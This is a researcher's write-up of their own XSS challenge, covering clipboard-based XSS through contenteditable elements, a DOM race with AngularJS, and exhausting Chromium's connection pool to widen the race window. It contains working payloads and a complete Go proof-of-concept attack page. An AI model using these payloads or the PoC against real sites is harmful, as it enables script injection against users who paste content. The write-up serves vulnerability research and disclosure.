DOM-based race condition: racing in the browser for fun

Disclaimer

All projects mentioned in this blog post have been contacted, and I confirmed that the behavior described in this article is either working as intended, already fixed, or will not be fixed.

TL;DR

The browser loads elements in the HTML from top to bottom, and some JavaScript libraries retrieve data or attributes from the DOM after the page has been completely loaded.
Because of how the contenteditable attribute works, we might have a race condition in applications that use those JavaScript libraries with the contenteditable element, depending on how the page loads the library.
In this article, I’ll explain how it’s possible and how to increase the timing window of this race.

The challenge

On October 6th, I posted the following XSS challenge.

I made a small XSS Challenge!

Can you pop an alert on this page? (The intended solution should be hard!)

Rules are included on the challenge page: https://t.co/e4CZByywdT pic.twitter.com/Xfdbij0iPC
— RyotaK (@ryotkak) October 6, 2023

The intended solution for this challenge looks like this.

Clipboard-based XSS (aka Copy & Paste XSS)

To explain the intended solution, I must first explain clipboard-based XSS.
In 2020, Michał Bentkowski published excellent research on XSS involving the clipboard.
This research focuses on exploiting the contenteditable attribute and paste event handlers.

Basically, the following snippet is vulnerable to clipboard-based XSS:

<input placeholder="Paste here" id="pasted"/>
<script>
document.addEventListener('paste', event => {
    const data = event.clipboardData.getData('text/html');
    pasted.innerHTML = data;
});
</script>

It can be exploited using the following page:

<button onclick="copy()">Click</button>
<script>
    document.addEventListener('copy', event => {
        event.preventDefault();
        event.clipboardData.setData('text/html', '<img src onerror=alert(1)>');
        alert('Please paste the copied contents into the vulnerable page');
    });
    function copy() {
        document.execCommand('copy');
    }
</script>

He also reported that the following page could be vulnerable to clipboard-based XSS because of vulnerabilities in the browser’s sanitizer:

<div contenteditable></div>

This was possible because:

The browser allows text/html data to be pasted as HTML instead of plain text.¹
To prevent XSS, the browser sanitized the contents of the text/html data.
However, there were flaws in this sanitizer, allowing him to bypass it and achieve XSS or various other impacts.

At the time of writing, there are no known ways to bypass this sanitizer, so using the contenteditable element alone doesn’t cause XSS.

However, when sanitizing the pasted contents, Chromium uses a deny-list approach rather than an allow-list approach to prevent XSS. This means that any attribute that doesn’t directly cause XSS is allowed, including custom attributes that JavaScript libraries interpret.²

third_party/blink/renderer/core/dom/element.cc line 2545-2550

bool Element::IsScriptingAttribute(const Attribute& attribute) const {
  return IsEventHandlerAttribute(attribute) ||
         IsJavaScriptURLAttribute(attribute) ||
         IsHTMLContentAttribute(attribute) ||
         IsSVGAnimationAttributeSettingJavaScriptURL(attribute);
}

This behavior can be used to exploit libraries that assume the contents of the DOM are trusted.
For example, projects such as rails-ujs or Kanboard could be exploited by pasting data-* attributes into the contenteditable element. (CVE-2023-23913, CVE-2023-32685)
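
To make the difference between the two approaches concrete, here is a minimal sketch of attribute filtering. It is a simplified model and not Chromium’s actual implementation: the function names, the plain-object representation of attributes, and the contents of the allow-list are all assumptions made for illustration.

```javascript
// Simplified model of attribute filtering; NOT Chromium's real sanitizer.
// An "element" is represented as a plain object: attribute name -> value.

// Deny-list: drop only attributes that are known to run script.
function isScriptingAttribute(name, value) {
  const isEventHandler = name.toLowerCase().startsWith('on');
  const isJavaScriptUrl = /^\s*javascript:/i.test(value);
  return isEventHandler || isJavaScriptUrl;
}

function sanitizeWithDenyList(attributes) {
  return Object.fromEntries(
    Object.entries(attributes).filter(
      ([name, value]) => !isScriptingAttribute(name, value)
    )
  );
}

// Allow-list: keep only attributes that are explicitly listed.
const ALLOWED_ATTRIBUTES = new Set(['title', 'alt', 'class']); // hypothetical list

function sanitizeWithAllowList(attributes) {
  return Object.fromEntries(
    Object.entries(attributes).filter(([name]) => ALLOWED_ATTRIBUTES.has(name))
  );
}

const pasted = {
  onclick: 'alert(1)',
  href: 'javascript:alert(1)',
  title: 'hello',
  'data-method': 'post',
  'ng-click': 'doSomething()',
};

const denyListResult = sanitizeWithDenyList(pasted);
const allowListResult = sanitizeWithAllowList(pasted);

console.log(Object.keys(denyListResult));  // [ 'title', 'data-method', 'ng-click' ]
console.log(Object.keys(allowListResult)); // [ 'title' ]
```

In this model, the deny-list removes the obviously dangerous attributes but lets data-method and ng-click through, which is exactly the kind of input a library that trusts the DOM will act on.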

ng-* attributes

Let’s get back to the challenge.
At this point, you may have noticed that AngularJS uses ng-* attributes to control its behavior.

For example, when opened, the following snippet will execute alert(1).³

<html ng-app>
  <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.3/angular.min.js"></script>
  <div ng-init="constructor.constructor('alert(1)')()"></div>
</html>
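
As a quick illustration of why the expression above ends in code execution, the following sketch runs in plain JavaScript without AngularJS. The scopeLike object is only a stand-in for the object an AngularJS expression is evaluated against (an assumption for this example), and a harmless function body replaces alert(1).

```javascript
// Every plain object inherits `constructor` (here: Object), and the
// constructor of Object itself is the global Function constructor.
const scopeLike = {}; // stand-in for an AngularJS scope object (assumption)

const reachedFunction = scopeLike.constructor.constructor;
console.log(reachedFunction === Function); // true

// Function(body) compiles a string into a function, so calling the result
// runs attacker-chosen code. A harmless body is used instead of alert(1).
const compiled = scopeLike.constructor.constructor('return 1 + 1');
console.log(compiled()); // 2
```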

So, you may think that we can pop an alert by pasting ng-* attributes into the challenge page.
But this is not the case for AngularJS.

Target of event listeners

To make the difference obvious, I’ll explain the vulnerability in rails-ujs (CVE-2023-23913). This vulnerability also depends on the existence of the contenteditable element and can be exploited by tricking the victim into pasting malicious data into the contenteditable element.

rails-ujs handled clicks by calling document.addEventListener("click", ...) instead of adding event listeners to each element when the page loads.

actionview/app/javascript/rails-ujs/utils/event.js line 71-80

const delegate = (element, selector, eventType, handler) => element.addEventListener(eventType, function(e) {
  [...]
})

actionview/app/javascript/rails-ujs/index.js line 106-107

  delegate(document, linkClickSelector, "click", handleRemote)
  delegate(document, linkClickSelector, "click", handleMethod)

Because it uses document.addEventListener, this event listener receives events from any element in the page, including elements added after rails-ujs is loaded.

So, CVE-2023-23913 could be exploited by simply tricking the victim into pasting the malicious data into the contenteditable element after the page is loaded.

However, AngularJS adds the event listener to each element with ng-* attributes after the DOMContentLoaded event is fired.

src/ng/directive/ngEventDirs.js line 59-89

function createEventDirective($parse, $rootScope, $exceptionHandler, directiveName, eventName, forceAsync) {
  return {
    restrict: 'A',
    compile: function($element, attr) {
      [...]
      var fn = $parse(attr[directiveName]);
      return function ngEventHandler(scope, element) {
        element.on(eventName, function(event) {
          [...]
        });
      };
    }
  };
}

  on: function jqLiteOn(element, type, fn, unsupported) {
    [...]
    var addHandler = function(type, specialHandlerWrapper, noEventListener) {
      var eventFns = events[type];

      if (!eventFns) {
        eventFns = events[type] = [];
        eventFns.specialHandlerWrapper = specialHandlerWrapper;
        if (type !== '$destroy' && !noEventListener) {
          element.addEventListener(type, handle);
        }
      }

      eventFns.push(fn);
    };
    [...]
  },

This means that simply pasting the following payload into the challenge page doesn’t work.

<div ng-app><div ng-click="constructor.constructor('alert(1)')()">Click me</div></div>
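
The difference between the two binding strategies can be sketched without a browser. The FakeNode class below is a hypothetical, minimal stand-in for DOM nodes with bubbling events, and compileOnce only imitates the idea of binding listeners once at load time; neither is code from rails-ujs or AngularJS.

```javascript
// Minimal stand-in for DOM nodes with bubbling events (illustrative model only).
class FakeNode {
  constructor(name, attributes = {}) {
    this.name = name;
    this.attributes = attributes;
    this.parent = null;
    this.children = [];
    this.listeners = [];
  }
  append(child) {
    child.parent = this;
    this.children.push(child);
    return child;
  }
  addEventListener(type, handler) {
    this.listeners.push({ type, handler });
  }
  // Dispatch on this node, then bubble up through its ancestors.
  dispatch(type) {
    for (let node = this; node !== null; node = node.parent) {
      for (const listener of node.listeners) {
        if (listener.type === type) listener.handler({ type, target: this });
      }
    }
  }
  // All descendants, depth first.
  descendants() {
    return this.children.flatMap((child) => [child, ...child.descendants()]);
  }
}

const log = [];
const documentRoot = new FakeNode('document');
const editable = documentRoot.append(new FakeNode('div', { contenteditable: '' }));

// Delegated style: one listener on the document, matched at click time.
documentRoot.addEventListener('click', (event) => {
  if ('data-method' in event.target.attributes) {
    log.push('delegated:' + event.target.name);
  }
});

// Per-element style: bind to each matching element once, at "compile" time.
function compileOnce(root) {
  for (const node of root.descendants()) {
    if ('ng-click' in node.attributes) {
      node.addEventListener('click', () => log.push('bound:' + node.name));
    }
  }
}
compileOnce(documentRoot);

// The victim pastes AFTER both libraries have initialised.
const pastedUjs = editable.append(new FakeNode('a', { 'data-method': 'post' }));
const pastedNg = editable.append(new FakeNode('span', { 'ng-click': 'payload()' }));

pastedUjs.dispatch('click'); // bubbles up to the delegated listener
pastedNg.dispatch('click');  // no listener was ever bound to this element

console.log(log); // [ 'delegated:a' ]
```

Only the delegated listener reacts to the element pasted after initialisation, which is why a late paste is enough for rails-ujs but not for AngularJS.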

HTML loading order

Before going further, I must explain how the browser loads an HTML document.

The browser normally loads the HTML document from top to bottom.⁴
For example:

<html>
  <div id="test"></div>
  <script>
    document.getElementById("test").innerHTML = "<h1>Hello world!</h1>";
  </script>
</html>

Assuming the HTML above is passed to the browser, the browser loads the <div> first and then evaluates the JavaScript in the <script> tag.

So, if we reverse the order of <div> and <script>, the following error occurs:

Uncaught TypeError: Cannot set properties of null (setting 'innerHTML')
    at [first line of the JavaScript]

This is because of the loading order: when the <script> tag is loaded and its JavaScript is evaluated, the <div id="test"> element has not been loaded yet.
So, document.getElementById("test") returns null, and access to the innerHTML property fails.
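
The same ordering effect can be reproduced with a toy model that runs outside the browser. The parseInOrder function and its token format are hypothetical and only imitate the top-to-bottom behavior described above; a real HTML parser is far more involved.

```javascript
// Toy parser: walks "tokens" in document order. Elements are registered as
// they are reached; scripts run immediately when they are reached.
function parseInOrder(tokens) {
  const parsedIds = new Set();
  const results = [];
  const fakeDocument = {
    // Mimics document.getElementById: null if the element is not parsed yet.
    getElementById: (id) => (parsedIds.has(id) ? { id } : null),
  };
  for (const token of tokens) {
    if (token.type === 'element') parsedIds.add(token.id);
    if (token.type === 'script') results.push(token.run(fakeDocument));
  }
  return results;
}

// A "script" that reports whether it could find the element.
const lookupTest = (doc) => doc.getElementById('test') !== null;

const divFirst = parseInOrder([
  { type: 'element', id: 'test' },
  { type: 'script', run: lookupTest },
]);
const scriptFirst = parseInOrder([
  { type: 'script', run: lookupTest },
  { type: 'element', id: 'test' },
]);

console.log(divFirst);    // [ true ]
console.log(scriptFirst); // [ false ]
```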

The code snippet to show which area is loaded

Racing with the AngularJS

Back to the challenge, we have the following HTML:

<div contenteditable>
  <h1>Solvers:</h1>
  [...]
</div>
<script src="https://angular-no-http3.ryotak.net/angular.min.js"></script>

As AngularJS evaluates ng-* attributes and other expressions once loaded, we must insert an element with the XSS payload before the AngularJS is loaded.

Since the script tag is placed below the contenteditable element, AngularJS is loaded after the contenteditable element is rendered.
So, there is a delay of approximately 30 ms between the moment the contenteditable element is rendered and the moment AngularJS is fully loaded.

This race window is tiny, yet we have to trick the victim into pasting within it.

The intended solution

30 ms is enough when exploiting a race condition where an attacker can repeatedly attempt the exploit. This time, however, we need to trick the victim into pasting the malicious data into the contenteditable element.
Since it’s hard to trick the victim into pasting within this time window, we need to extend it.

After the previous graph’s Parse HTML section, the browser must fetch the AngularJS from the remote host if it’s not cached already.

Luckily, there is a technique to delay requests by exhausting the connection pool.
The XS-Leaks Wiki explains this technique well, so I’ll only summarize it here.

In Chromium, there are hard limits on the number of connections that can be established simultaneously.
For TCP, the limit is 256 connections, as shown in the snippet below.⁵

net/socket/client_socket_pool_manager.cc line 32-36

// Limit of sockets of each socket pool.
int g_max_sockets_per_pool[] = {
  256,  // NORMAL_SOCKET_POOL
  256   // WEBSOCKET_SOCKET_POOL
};

As the connection pool is shared across all hosts, if we open 256 connections that won’t be disconnected (e.g., by not sending the response), no further connections can be established, and the browser will wait until one of these connections is closed.
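
A toy model of this behavior might look like the following. The SocketPool class is hypothetical and only captures the two properties relied on here: a hard limit and a queue of waiting requests. Real Chromium scheduling (priorities, per-host limits, idle sockets) is more involved.

```javascript
// Toy model of a shared socket pool with a hard limit and a waiting queue.
class SocketPool {
  constructor(limit) {
    this.limit = limit;
    this.active = new Set();
    this.queue = [];
  }
  // Returns true if the request got a socket, false if it has to wait.
  request(name) {
    if (this.active.size < this.limit) {
      this.active.add(name);
      return true;
    }
    this.queue.push(name);
    return false;
  }
  // Closing a connection hands its slot to the oldest waiting request.
  close(name) {
    if (!this.active.delete(name)) return;
    if (this.queue.length > 0) this.active.add(this.queue.shift());
  }
}

const pool = new SocketPool(256);
for (let i = 0; i < 256; i++) {
  pool.request('attacker-' + i); // the server never answers these
}

const gotSocket = pool.request('angular.min.js');
console.log(gotSocket);  // false
console.log(pool.queue); // [ 'angular.min.js' ]

pool.close('attacker-0'); // freeing one slot lets the waiting request proceed
console.log(pool.active.has('angular.min.js')); // true
```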

A graph that shows the exhausted connection pool, and the browser can’t process the request from the queue

This is useful for pausing the loading of AngularJS and extending the race window, but we still need to open a connection to the host of the challenge page. Otherwise, the challenge page won’t load, and the contenteditable element won’t be rendered.
To deal with this, we can cancel one connection after exhausting the connection pool and opening the challenge page, then quickly open another connection.

By doing so, the connection pool works as follows:

1. After exhausting the connection pool, no further connections can be established. So, the challenge page will be kept from loading.
2. Several seconds after opening the challenge page, we cancel one connection (①) and quickly open another connection (③). At this point, the connection to the challenge page is established (②), but the browser still needs to fetch and parse the HTML.
3. Once the challenge page is fetched and parsed, the browser queues the connection to the host of the AngularJS file (②) and finishes the connection to the challenge page (①).
4. Because we queued another connection in the previous step, the connection pool is exhausted again, and the AngularJS file will not be fetched.
5. At this point, the contenteditable element is already rendered, so the victim can paste the malicious data without rushing.
6. After several seconds, we cancel the connection opened in step 2 (①). By doing so, the browser can open the connection to the host of the AngularJS file (②) and evaluate the contents. Since the victim pasted the malicious data into the contenteditable element before AngularJS is loaded, it will evaluate the pasted expressions, and alert(document.domain) will be executed.
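
The sequence above can be replayed against a small model. The createPool helper and the connection names are hypothetical, and the model assumes that waiting requests are served strictly in first-in, first-out order, which is a simplification of what the browser actually does.

```javascript
// Toy FIFO pool (assumption: waiting requests are served strictly in order).
function createPool(limit) {
  const active = [];
  const queue = [];
  const timeline = [];
  const promote = () => {
    while (active.length < limit && queue.length > 0) {
      const next = queue.shift();
      active.push(next);
      timeline.push('start ' + next);
    }
  };
  return {
    timeline,
    open(name) { queue.push(name); promote(); },
    close(name) {
      const index = active.indexOf(name);
      if (index !== -1) { active.splice(index, 1); promote(); }
    },
    isActive: (name) => active.includes(name),
  };
}

const swapPool = createPool(256);

// Exhaust the pool: 255 fillers plus one connection we can cancel later.
for (let i = 0; i < 255; i++) swapPool.open('filler-' + i);
swapPool.open('swap-1');
swapPool.open('challenge page');  // queued: the page cannot load yet

swapPool.close('swap-1');         // the challenge page takes the free slot
swapPool.open('swap-2');          // queued immediately behind it
swapPool.open('angular.min.js');  // requested once the page is parsed
swapPool.close('challenge page'); // swap-2 takes the slot, not AngularJS

// The contenteditable element is rendered; the victim pastes here.
const angularBlockedDuringPaste = !swapPool.isActive('angular.min.js');

swapPool.close('swap-2');         // now AngularJS can finally be fetched

const tail = swapPool.timeline.slice(255);
console.log(angularBlockedDuringPaste); // true
console.log(tail);
// [ 'start swap-1', 'start challenge page', 'start swap-2', 'start angular.min.js' ]
```

In this model, the time between closing the challenge page connection and closing swap-2 is entirely under the attacker’s control, which corresponds to the extended race window.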

By putting it all together, this challenge can be solved by using the following code:⁶

package main

import (
        "fmt"
        "log"
        "net/http"
        "strconv"
        "time"
)

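const (
        // SERVER_IP must be set to the address of the host running this PoC,
        // as reachable from the victim's browser.
        SERVER_IP = ""
)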

func attack(w http.ResponseWriter, r *http.Request) {
        w.Header().Set("Content-Type", "text/html")
        fmt.Fprintf(w, `
<script>
async function fill_sockets(amount) {
        return new Promise((resolve, reject) => {
                let count = 0;
                const intervalId = setInterval(() => {
                        if(count >= amount) {
                                clearInterval(intervalId);
                                resolve();
                                return;
                        }
                        fetch('http://%s:' + (28000 + count) + '/sleep', {mode: "no-cors", cache: "no-store"});
                        count++;
                }, 5);
        });
}

async function swap_connections(func, delay) {
        let timer = new AbortController();
        setTimeout(() => {
                timer.abort();
                timer = new AbortController();
                setTimeout(() => timer.abort(), delay*1000);
                fetch('http://%[1]s:28255/sleep', {mode: "no-cors", cache: "no-store", signal: timer.signal});
        }, 1000);
        fetch('http://%[1]s:28255/sleep', {mode: "no-cors", cache: "no-store", signal: timer.signal});
        func();
}

async function attack() {
        document.execCommand("copy");
        document.write("Filling the connection pool...<br>");
        await fill_sockets(255);
        document.write("Opening the victim page...<br>");
        swap_connections(() => {
                window.open('https://ryotak-challenges.github.io/xss-chall-1/', '_blank');
        }, 10);
}

document.addEventListener('copy', (e) => {
        e.preventDefault();
        e.clipboardData.setData('text/html', '<br><div data-ng-app>{{constructor.constructor("alert(document.domain)")();}}</div>');
        document.write("Copied the payload<br>");
});
</script>
<button onclick=attack()>Attack</button>`, SERVER_IP)
}

func sleep(w http.ResponseWriter, r *http.Request) {
        time.Sleep(24 * time.Hour * 365)
}

func handleRequests() {
        http.HandleFunc("/", attack)
        http.HandleFunc("/sleep", sleep)

        for i := 1; i <= 256; i++ {
                go http.ListenAndServe(":"+strconv.Itoa(28000+i), nil)
        }
        log.Fatal(http.ListenAndServe(":28000", nil))
}

func main() {
        handleRequests()
}

This technique is not limited to AngularJS; it can be applied to any JavaScript library when the following conditions are met:

The library retrieves data from the DOM after loading the page.
The library doesn’t ignore elements under the contenteditable element.
The user of the library uses the contenteditable element and loads the library afterward.
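
As an illustration of the second condition, here is a sketch of what “ignoring elements under the contenteditable element” could look like. The isInsideContentEditable helper is hypothetical and not taken from any library mentioned in this article; it works on any object exposing parentNode and getAttribute, so the stub nodes below are enough to try it outside a browser.

```javascript
// Returns true if the node or ANY ancestor carries a contenteditable attribute
// whose value is not "false". Every ancestor is checked on purpose: pasted
// markup could itself contain contenteditable="false" to look non-editable.
function isInsideContentEditable(node) {
  for (let current = node; current; current = current.parentNode) {
    if (typeof current.getAttribute !== 'function') continue;
    const value = current.getAttribute('contenteditable');
    if (value !== null && value.toLowerCase() !== 'false') return true;
  }
  return false;
}

// Stub nodes standing in for DOM elements (assumption for this example).
const stub = (attributes, parentNode = null) => ({
  parentNode,
  getAttribute: (name) => (name in attributes ? attributes[name] : null),
});

const page = stub({});
const editor = stub({ contenteditable: '' }, page);
const pastedNode = stub({ 'ng-click': 'payload()' }, editor);
const trustedNode = stub({ 'ng-click': 'save()' }, page);

console.log(isInsideContentEditable(pastedNode));  // true
console.log(isInsideContentEditable(trustedNode)); // false
```

A library could skip nodes for which such a check returns true before reading attributes from them. Whether that is sufficient depends on the library and is not something this sketch tries to establish.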

Also, it’s important to note that some vendors consider it the responsibility of the developers using libraries not to use the libraries with the contenteditable element.

Appendix: Unintended Solutions

When releasing the challenge, I thought it was impossible to exploit this tiny race window without expanding it by using the technique above, or at least impossible to exploit it manually. Still, exploiting it was possible if you tried hard enough.

@LiveOverflow and @stueotue found a way to exploit this tiny race window:

@LiveOverflow sent a solution that repeats pasting, sometimes winning this race.

And @stueotue sent a solution that uses drag and drop, inspired by Renwa’s write-up. It also sometimes wins the race if the timing matches.

Both solutions are excellent, and I’m really impressed by their creativity.
This challenge was the first XSS challenge that I posted on my account, so it was a good lesson for me not to underestimate the creativity of the community ;)

¹ The pasted data is inserted into the DOM, rather than being stored in the value property as with the <input> tag. For example, pasting <a href="https://example.com">Test</a> into the contenteditable element as text/html will create the <a> tag with https://example.com as the href attribute.
² It’s interesting that Firefox seems to use an allow-list approach when sanitizing the contents. I think there might be a way to bypass Chromium’s sanitizer.
³ If you want to know why constructor.constructor('alert(1)')() is used instead of the usual alert(1), please read this article: https://portswigger.net/research/dom-based-angularjs-sandbox-escapes
⁴ There are some exceptions, such as the defer attribute of the <script> tag, but I won’t explain them in this article.
⁵ According to the XS-Leaks Wiki, UDP is limited to 6000 connections, so if HTTP/3 is enabled, you may need to open many more connections to exhaust the connection pool.
⁶ To prevent HTTP/2 connection reuse, this PoC uses 256 different ports instead of sending requests to the same port. (This code is a bit dirty, but it works! … at least on my machine.)